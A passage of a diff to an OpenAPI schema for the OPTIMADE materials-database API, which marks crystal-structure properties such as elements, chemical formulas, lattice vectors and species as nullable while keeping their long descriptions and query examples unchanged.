followed by a number of lowercase letters.\n - The order MUST be alphabetical.\n - Note: This property SHOULD NOT contain the string \"X\" to indicate non-chemical elements or \"vacancy\" to indicate vacancies (in contrast to the field `chemical_symbols` for the `species` property).\n\n- **Examples**:\n - `[\"Si\"]`\n - `[\"Al\",\"O\",\"Si\"]`\n\n- **Query examples**:\n - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL \"Si\", \"Al\", \"O\"`.\n - To match structures with exactly these three elements, use `elements HAS ALL \"Si\", \"Al\", \"O\" AND elements LENGTH 3`." + "description": "Names of the different elements present in the structure.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The strings are the chemical symbols, i.e., either a single uppercase letter or an uppercase letter followed by a number of lowercase letters.\n - The order MUST be alphabetical.\n - Note: This property SHOULD NOT contain the string \"X\" to indicate non-chemical elements or \"vacancy\" to indicate vacancies (in contrast to the field `chemical_symbols` for the `species` property).\n\n- **Examples**:\n - `[\"Si\"]`\n - `[\"Al\",\"O\",\"Si\"]`\n\n- **Query examples**:\n - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL \"Si\", \"Al\", \"O\"`.\n - To match structures with exactly these three elements, use `elements HAS ALL \"Si\", \"Al\", \"O\" AND elements LENGTH 3`.", + "nullable": true }, "nelements": { "title": "Nelements", "type": "integer", - "description": "Number of different elements in the structure as an integer.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all 
implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `3`\n\n- **Querying**:\n - Note: queries on this property can equivalently be formulated using `elements LENGTH`.\n - A filter that matches structures that have exactly 4 elements: `nelements=4`.\n - A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`." + "description": "Number of different elements in the structure as an integer.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `3`\n\n- **Querying**:\n - Note: queries on this property can equivalently be formulated using `elements LENGTH`.\n - A filter that matches structures that have exactly 4 elements: `nelements=4`.\n - A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`.", + "nullable": true }, "elements_ratios": { "title": "Elements Ratios", @@ -3041,18 +3044,21 @@ "items": { "type": "number" }, - "description": "Relative proportions of different elements in the structure.\n\n- **Type**: list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - Composed by the proportions of elements in the structure as a list of floating point numbers.\n - The sum of the numbers MUST be 1.0 (within floating point accuracy)\n\n- **Examples**:\n - `[1.0]`\n - `[0.3333333333333333, 0.2222222222222222, 0.4444444444444444]`\n\n- **Query examples**:\n - Note: Useful filters can be formulated using the set operator syntax for correlated values.\n However, since the values are floating point 
values, the use of equality comparisons is generally inadvisable.\n - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL \"Al\":>0.3333, \"Al\":<0.3334`." + "description": "Relative proportions of different elements in the structure.\n\n- **Type**: list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - Composed by the proportions of elements in the structure as a list of floating point numbers.\n - The sum of the numbers MUST be 1.0 (within floating point accuracy)\n\n- **Examples**:\n - `[1.0]`\n - `[0.3333333333333333, 0.2222222222222222, 0.4444444444444444]`\n\n- **Query examples**:\n - Note: Useful filters can be formulated using the set operator syntax for correlated values.\n However, since the values are floating point values, the use of equality comparisons is generally inadvisable.\n - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL \"Al\":>0.3333, \"Al\":<0.3334`.", + "nullable": true }, "chemical_formula_descriptive": { "title": "Chemical Formula Descriptive", "type": "string", - "description": "The chemical formula for a structure as a string in a form chosen by the API implementation.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The chemical formula is given as a string consisting of properly capitalized element symbols followed by integers or decimal numbers, balanced parentheses, square, and curly brackets `(`,`)`, `[`,`]`, `{`, `}`, commas, the `+`, `-`, `:` and `=` symbols. 
The parentheses are allowed to be followed by a number. Spaces are allowed anywhere except within chemical symbols. The order of elements and any groupings indicated by parentheses or brackets are chosen freely by the API implementation.\n - The string SHOULD be arithmetically consistent with the element ratios in the `chemical_formula_reduced` property.\n - It is RECOMMENDED, but not mandatory, that symbols, parentheses and brackets, if used, are used with the meanings prescribed by [IUPAC's Nomenclature of Organic Chemistry](https://www.qmul.ac.uk/sbcs/iupac/bibliog/blue.html).\n\n- **Examples**:\n - `\"(H2O)2 Na\"`\n - `\"NaCl\"`\n - `\"CaCO3\"`\n - `\"CCaO3\"`\n - `\"(CH3)3N+ - [CH2]2-OH = Me3N+ - CH2 - CH2OH\"`\n\n- **Query examples**:\n - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent.\n - A filter that matches an exactly given formula: `chemical_formula_descriptive=\"(H2O)2 Na\"`.\n - A filter that does a partial match: `chemical_formula_descriptive CONTAINS \"H2O\"`." + "description": "The chemical formula for a structure as a string in a form chosen by the API implementation.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The chemical formula is given as a string consisting of properly capitalized element symbols followed by integers or decimal numbers, balanced parentheses, square, and curly brackets `(`,`)`, `[`,`]`, `{`, `}`, commas, the `+`, `-`, `:` and `=` symbols. The parentheses are allowed to be followed by a number. Spaces are allowed anywhere except within chemical symbols. 
The order of elements and any groupings indicated by parentheses or brackets are chosen freely by the API implementation.\n - The string SHOULD be arithmetically consistent with the element ratios in the `chemical_formula_reduced` property.\n - It is RECOMMENDED, but not mandatory, that symbols, parentheses and brackets, if used, are used with the meanings prescribed by [IUPAC's Nomenclature of Organic Chemistry](https://www.qmul.ac.uk/sbcs/iupac/bibliog/blue.html).\n\n- **Examples**:\n - `\"(H2O)2 Na\"`\n - `\"NaCl\"`\n - `\"CaCO3\"`\n - `\"CCaO3\"`\n - `\"(CH3)3N+ - [CH2]2-OH = Me3N+ - CH2 - CH2OH\"`\n\n- **Query examples**:\n - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent.\n - A filter that matches an exactly given formula: `chemical_formula_descriptive=\"(H2O)2 Na\"`.\n - A filter that does a partial match: `chemical_formula_descriptive CONTAINS \"H2O\"`.", + "nullable": true }, "chemical_formula_reduced": { "title": "Chemical Formula Reduced", "pattern": "^([A-Z][a-z]?\\d*)*$", "type": "string", - "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element names MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For 
structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`." + "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element names MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. 
The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`.", + "nullable": true }, "chemical_formula_hill": { "title": "Chemical Formula Hill", @@ -3064,7 +3070,8 @@ "title": "Chemical Formula Anonymous", "pattern": "^([A-Z][a-z]?\\d*)*$", "type": "string", - "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`." + "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... 
and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`.", + "nullable": true }, "dimension_types": { "title": "Dimension Types", @@ -3074,12 +3081,14 @@ "items": { "$ref": "#/components/schemas/Periodicity" }, - "description": "List of three integers.\nFor each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`).\nNote: the elements in this list each refer to the direction of the corresponding entry in `lattice_vectors` and *not* the Cartesian x, y, z directions.\n\n- **Type**: list of integers.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - MUST be a list of length 3.\n - Each integer element MUST assume only the value 0 or 1.\n\n- **Examples**:\n - For a molecule: `[0, 0, 0]`\n - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]`\n - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]`\n - For a bulk 3D system: `[1, 1, 1]`" + "description": "List of three integers.\nFor each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`).\nNote: the elements in this list each refer to the direction of the corresponding entry in 
`lattice_vectors` and *not* the Cartesian x, y, z directions.\n\n- **Type**: list of integers.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - MUST be a list of length 3.\n - Each integer element MUST assume only the value 0 or 1.\n\n- **Examples**:\n - For a molecule: `[0, 0, 0]`\n - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]`\n - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]`\n - For a bulk 3D system: `[1, 1, 1]`", + "nullable": true }, "nperiodic_dimensions": { "title": "Nperiodic Dimensions", "type": "integer", - "description": "An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The integer value MUST be between 0 and 3 inclusive and MUST be equal to the sum of the items in the `dimension_types` property.\n - This property only reflects the treatment of the lattice vectors provided for the structure, and not any physical interpretation of the dimensionality of its contents.\n\n- **Examples**:\n - `2` should be indicated in cases where `dimension_types` is any of `[1, 1, 0]`, `[1, 0, 1]`, `[0, 1, 1]`.\n\n- **Query examples**:\n - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3`\n - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`" + "description": "An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`.\n\n- **Type**: integer\n\n- 
**Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The integer value MUST be between 0 and 3 inclusive and MUST be equal to the sum of the items in the `dimension_types` property.\n - This property only reflects the treatment of the lattice vectors provided for the structure, and not any physical interpretation of the dimensionality of its contents.\n\n- **Examples**:\n - `2` should be indicated in cases where `dimension_types` is any of `[1, 1, 0]`, `[1, 0, 1]`, `[0, 1, 1]`.\n\n- **Query examples**:\n - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3`\n - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`", + "nullable": true }, "lattice_vectors": { "title": "Lattice Vectors", @@ -3094,7 +3103,8 @@ "minItems": 3, "maxItems": 3 }, - "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the 
elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`." + "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors 
in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.", + "nullable": true }, "cartesian_site_positions": { "title": "Cartesian Site Positions", @@ -3107,12 +3117,14 @@ "minItems": 3, "maxItems": 3 }, - "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin." 
+ "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin.", + "nullable": true }, "nsites": { "title": "Nsites", "type": "integer", - "description": "An integer specifying the length of the `cartesian_site_positions` property.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `42`\n\n- **Query examples**:\n - Match only structures with exactly 4 sites: `nsites=4`\n - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`" + "description": "An integer specifying the length of the `cartesian_site_positions` property.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property 
with support for all mandatory filter features.\n\n- **Examples**:\n - `42`\n\n- **Query examples**:\n - Match only structures with exactly 4 sites: `nsites=4`\n - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`", + "nullable": true }, "species": { "title": "Species", @@ -3120,7 +3132,8 @@ "items": { "$ref": "#/components/schemas/Species" }, - "description": "A list describing the species of the sites of this structure.\nSpecies can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3).\n\n- **Type**: list of dictionary with keys:\n - `name`: string (REQUIRED)\n - `chemical_symbols`: list of strings (REQUIRED)\n - `concentration`: list of float (REQUIRED)\n - `mass`: float (OPTIONAL)\n - `original_name`: string (OPTIONAL).\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - Each list member MUST be a dictionary with the following keys:\n - **name**: REQUIRED; gives the name of the species; the **name** value MUST be unique in the `species` list;\n - **chemical_symbols**: REQUIRED; MUST be a list of strings of all chemical elements composing this species.\n Each item of the list MUST be one of the following:\n - a valid chemical-element name, or\n - the special value `\"X\"` to represent a non-chemical element, or\n - the special value `\"vacancy\"` to represent that this site has a non-zero probability of having a vacancy (the respective 
probability is indicated in the `concentration` list, see below).\n\n If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.\n\n - **concentration**: REQUIRED; MUST be a list of floats, with same length as `chemical_symbols`.\n The numbers represent the relative concentration of the corresponding chemical symbol in this species.\n The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories:\n\n - Numerical errors when representing float numbers in fixed precision, e.g. for two chemical symbols with concentrations `1/3` and `2/3`, the concentration might look something like `[0.33333333333, 0.66666666666]`. If the client is aware that the sum is not one because of numerical precision, it can renormalize the values so that the sum is exactly one.\n - Experimental errors in the data present in the database. In this case, it is the responsibility of the client to decide how to process the data.\n\n Note that concentrations are uncorrelated between different sites (even of the same species).\n\n - **attached**: OPTIONAL; if provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or \"X\" for a non-chemical element.\n\n - **nattached**: OPTIONAL; if provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the `attached` key.\n\n The implementation MUST include either both or none of the `attached` and `nattached` keys, and if they are provided, they MUST be of the same length.\n Furthermore, if they are provided, the `structure_features` property MUST include the string `site_attachments`.\n\n - **mass**: OPTIONAL. If present MUST be a float expressed in a.m.u.\n\n - **original_name**: OPTIONAL. 
Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database.\n\n Note: With regards to \"source database\", we refer to the immediate source being queried via the OPTIMADE API implementation.\n\n The main use of this field is for source databases that use species names, containing characters that are not allowed (see description of the list property `species_at_sites`).\n\n - For systems that have only species formed by a single chemical symbol, and that have at most one species per chemical symbol, SHOULD use the chemical symbol as species name (e.g., `\"Ti\"` for titanium, `\"O\"` for oxygen, etc.)\n However, note that this is OPTIONAL, and client implementations MUST NOT assume that the key corresponds to a chemical symbol, nor assume that if the species name is a valid chemical symbol, that it represents a species with that chemical symbol.\n This means that a species `{\"name\": \"C\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]}` is valid and represents a titanium species (and *not* a carbon species).\n - It is NOT RECOMMENDED that a structure includes species that do not have at least one corresponding site.\n\n- **Examples**:\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]} ]`: any site with this species is occupied by a Ti atom.\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\", \"vacancy\"], \"concentration\": [0.9, 0.1]} ]`: any site with this species is occupied by a Ti atom with 90 % probability, and has a vacancy with 10 % probability.\n - `[ {\"name\": \"BaCa\", \"chemical_symbols\": [\"vacancy\", \"Ba\", \"Ca\"], \"concentration\": [0.05, 0.45, 0.5], \"mass\": 88.5} ]`: any site with this species is occupied by a Ba atom with 45 % probability, a Ca atom with 50 % probability, and by a vacancy with 5 % probability. 
The mass of this site is (on average) 88.5 a.m.u.\n - `[ {\"name\": \"C12\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12.\n - `[ {\"name\": \"C13\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13.\n - `[ {\"name\": \"CH3\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"attached\": [\"H\"], \"nattached\": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms." + "description": "A list describing the species of the sites of this structure.\nSpecies can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3).\n\n- **Type**: list of dictionary with keys:\n - `name`: string (REQUIRED)\n - `chemical_symbols`: list of strings (REQUIRED)\n - `concentration`: list of float (REQUIRED)\n - `mass`: float (OPTIONAL)\n - `original_name`: string (OPTIONAL).\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - Each list member MUST be a dictionary with the following keys:\n - **name**: REQUIRED; gives the name of the species; the **name** value MUST be unique in the `species` list;\n - **chemical_symbols**: REQUIRED; MUST be a list of strings of all chemical elements composing 
this species.\n Each item of the list MUST be one of the following:\n - a valid chemical-element name, or\n - the special value `\"X\"` to represent a non-chemical element, or\n - the special value `\"vacancy\"` to represent that this site has a non-zero probability of having a vacancy (the respective probability is indicated in the `concentration` list, see below).\n\n If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.\n\n - **concentration**: REQUIRED; MUST be a list of floats, with same length as `chemical_symbols`.\n The numbers represent the relative concentration of the corresponding chemical symbol in this species.\n The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories:\n\n - Numerical errors when representing float numbers in fixed precision, e.g. for two chemical symbols with concentrations `1/3` and `2/3`, the concentration might look something like `[0.33333333333, 0.66666666666]`. If the client is aware that the sum is not one because of numerical precision, it can renormalize the values so that the sum is exactly one.\n - Experimental errors in the data present in the database. 
In this case, it is the responsibility of the client to decide how to process the data.\n\n Note that concentrations are uncorrelated between different sites (even of the same species).\n\n - **attached**: OPTIONAL; if provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or \"X\" for a non-chemical element.\n\n - **nattached**: OPTIONAL; if provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the `attached` key.\n\n The implementation MUST include either both or none of the `attached` and `nattached` keys, and if they are provided, they MUST be of the same length.\n Furthermore, if they are provided, the `structure_features` property MUST include the string `site_attachments`.\n\n - **mass**: OPTIONAL. If present MUST be a float expressed in a.m.u.\n\n - **original_name**: OPTIONAL. Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database.\n\n Note: With regards to \"source database\", we refer to the immediate source being queried via the OPTIMADE API implementation.\n\n The main use of this field is for source databases that use species names, containing characters that are not allowed (see description of the list property `species_at_sites`).\n\n - For systems that have only species formed by a single chemical symbol, and that have at most one species per chemical symbol, SHOULD use the chemical symbol as species name (e.g., `\"Ti\"` for titanium, `\"O\"` for oxygen, etc.)\n However, note that this is OPTIONAL, and client implementations MUST NOT assume that the key corresponds to a chemical symbol, nor assume that if the species name is a valid chemical symbol, that it represents a species with that chemical symbol.\n This means that a species `{\"name\": \"C\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]}` is valid and 
represents a titanium species (and *not* a carbon species).\n - It is NOT RECOMMENDED that a structure includes species that do not have at least one corresponding site.\n\n- **Examples**:\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]} ]`: any site with this species is occupied by a Ti atom.\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\", \"vacancy\"], \"concentration\": [0.9, 0.1]} ]`: any site with this species is occupied by a Ti atom with 90 % probability, and has a vacancy with 10 % probability.\n - `[ {\"name\": \"BaCa\", \"chemical_symbols\": [\"vacancy\", \"Ba\", \"Ca\"], \"concentration\": [0.05, 0.45, 0.5], \"mass\": 88.5} ]`: any site with this species is occupied by a Ba atom with 45 % probability, a Ca atom with 50 % probability, and by a vacancy with 5 % probability. The mass of this site is (on average) 88.5 a.m.u.\n - `[ {\"name\": \"C12\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12.\n - `[ {\"name\": \"C13\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13.\n - `[ {\"name\": \"CH3\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"attached\": [\"H\"], \"nattached\": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms.", + "nullable": true }, "species_at_sites": { "title": "Species At Sites", @@ -3128,7 +3141,8 @@ "items": { "type": "string" }, - "description": "Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`).\nThe properties of the species are found in the property `species`.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, 
